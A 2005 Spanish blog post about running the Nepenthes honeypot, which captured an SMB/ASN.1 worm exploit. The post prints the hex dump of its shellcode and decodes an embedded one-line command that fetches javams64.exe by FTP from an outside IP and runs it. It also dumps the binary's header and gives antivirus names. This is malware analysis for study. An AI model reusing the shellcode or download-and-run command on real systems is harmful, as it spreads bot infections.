noviembre 11, 2005

Probando el recolector de malware Nepenthes

Tras compilar e iniciar el programa (Nepenthes) sin apenas esfuerzo ni configuración, se empieza a recibir información de montones de gusanos intentando explotar los puertos que se han puesto a la escucha (los mas comunes, como no, los que aprovechan vulnerabilidades en windows).

Pasteo a continuación el contenido de uno de estos gusanos con un interesante payload:

Unknown ASN1_SMB Shellcode (Buffer 4291 bytes) (State 1)
00000000  00 00 10 bf ff 53 4d 42  73 00 00 00 00 18 07 c8  |.....SMBs.......|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 37 13  |..............7.|
00000020  00 00 00 00 0c ff 00 00  00 04 11 0a 00 00 00 00  |................|
00000030  00 00 00 7e 10 00 00 00  00 d4 00 00 80 7e 10 60  |...~.........~.`|
00000040  82 10 7a 06 06 2b 06 01  05 05 02 a0 82 10 6e 30  |..z..+........n0|
00000050  82 10 6a a1 82 10 66 23  82 10 62 03 82 04 01 00  |..j...f#..b.....|
00000060  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
*
00000460  03 00 23 82 0c 57 03 82  04 0a 00 90 42 90 42 90  |..#..W......B.B.|
00000470  42 90 42 81 c4 54 f2 ff  ff fc e8 46 00 00 00 8b  |B.B..T.....F....|
00000480  45 3c 8b 7c 05 78 01 ef  8b 4f 18 8b 5f 20 01 eb  |E<.|.x...O.._ ..|
00000490  e3 2e 49 8b 34 8b 01 ee  31 c0 99 ac 84 c0 74 07  |..I.4...1.....t.|
000004a0  c1 ca 0d 01 c2 eb f4 3b  54 24 04 75 e3 8b 5f 24  |.......;T$.u.._$|
000004b0  01 eb 66 8b 0c 4b 8b 5f  1c 01 eb 8b 1c 8b 01 eb  |..f..K._........|
000004c0  89 5c 24 04 c3 31 c0 64  8b 40 30 85 c0 78 0f 8b  |.\$..1.d.@0..x..|
000004d0  40 0c 8b 70 1c ad 8b 68  08 e9 0b 00 00 00 8b 40  |@..p...h.......@|
000004e0  34 05 7c 00 00 00 8b 68  3c 5f 31 f6 60 56 eb 0d  |4.|....h<_1.`V..|
000004f0  68 ef ce e0 60 68 98 fe  8a 0e 57 ff e7 e8 ee ff  |h...`h....W.....|
00000500  ff ff 65 63 68 6f 20 6f  70 65 6e 20 38 30 2e 33  |..echo open 80.3|
00000510  34 2e 35 38 2e 37 36 20  31 33 38 35 38 20 3e 20  |4.58.76 13858 > |
00000520  6f 26 65 63 68 6f 20 75  73 65 72 20 31 20 31 20  |o&echo user 1 1 |
00000530  3e 3e 20 6f 20 26 65 63  68 6f 20 67 65 74 20 6a  |>> o &echo get j|
00000540  61 76 61 6d 73 36 34 2e  65 78 65 20 3e 3e 20 6f  |avams64.exe >> o|
00000550  20 26 65 63 68 6f 20 71  75 69 74 20 3e 3e 20 6f  | &echo quit >> o|
00000560  20 26 66 74 70 20 2d 6e  20 2d 73 3a 6f 20 26 64  | &ftp -n -s:o &d|
00000570  65 6c 20 2f 46 20 2f 51  20 6f 20 26 6a 61 76 61  |el /F /Q o &java|
00000580  6d 73 36 34 2e 65 78 65  0d 0a 00 42 42 42 42 42  |ms64.exe...BBBBB|
00000590  42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42  |BBBBBBBBBBBBBBBB|
...


El payload consigue ejecutar en una sola linea la descarga de un fichero desde un ftp y su posterior ejecución, veamos:

echo open 80.34.58.76 13858 > o&echo user 1 1 >> o &echo get javams64.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &javams64.exe

Descargamos el archivo javams64.exe:

00000000  4d 5a 90 00 03 00 00 00  04 00 00 00 ff ff 00 00  |MZ..............|
00000010  b8 00 00 00 00 00 00 00  40 00 00 00 00 00 00 44  |........@......D|
00000020  6f 74 46 69 78 20 5b 47  50 63 48 5d 20 20 20 20  |otFix [GPcH]    |
00000030  20 20 20 20 20 20 20 20  20 20 20 20 e8 00 00 00  |            ....|
00000040  0e 1f ba 0e 00 b4 09 cd  21 b8 01 4c cd 21 54 68  |........!..L.!Th|
00000050  69 73 20 70 72 6f 67 72  61 6d 20 63 61 6e 6e 6f  |is program canno|
00000060  74 20 62 65 20 72 75 6e  20 69 6e 20 44 4f 53 20  |t be run in DOS |
00000070  6d 6f 64 65 2e 0d 0d 0a  24 00 00 00 00 00 00 00  |mode....$.......|
00000080  93 41 cc 56 d7 20 a2 05  d7 20 a2 05 d7 20 a2 05  |.A.V. ... ... ..|
*
000001e0  2e 61 73 70 61 63 6b 00  00 a0 04 00 00 10 00 00  |.aspack.........|
000001f0  00 04 00 00 00 04 00 00  00 00 00 00 00 00 00 00  |................|
00000200  00 00 00 00 40 00 00 c0  2e 73 68 69 65 6c 64 00  |....@....shield.|
00000210  00 50 01 00 00 b0 04 00  00 4a 01 00 00 04 00 00  |.P.......J......|
00000220  00 00 00 00 00 00 00 00  00 00 00 00 40 00 00 c0  |............@...|
00000230  2e 6e 66 6f 00 00 00 00  00 10 50 00 00 00 06 00  |.nfo......P.....|
00000240  00 02 00 00 00 4e 01 00  00 00 00 00 00 00 00 00  |.....N..........|
00000250  00 00 00 00 40 00 00 c0  2e 6e 66 6f 00 00 00 00  |....@....nfo....|
*
000003d0  00 00 00 00 00 00 00 00  00 00 00 31 2e 32 35 00  |...........1.25.|
000003e0  47 50 63 48 0b 00 00 0a  00 00 00 00 00 00 00 00  |GPcH............|
000003f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 ff 95  |................|

Pasandolo por VirusTotal que Kaspersky detecta [Backdoor.Win32.Rbot.gen] y Panda [W32/Sdbot.FQF.worm].
Publicado por fsantos a las 15:41

comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)
@2005-2011, Francisco Javier Santos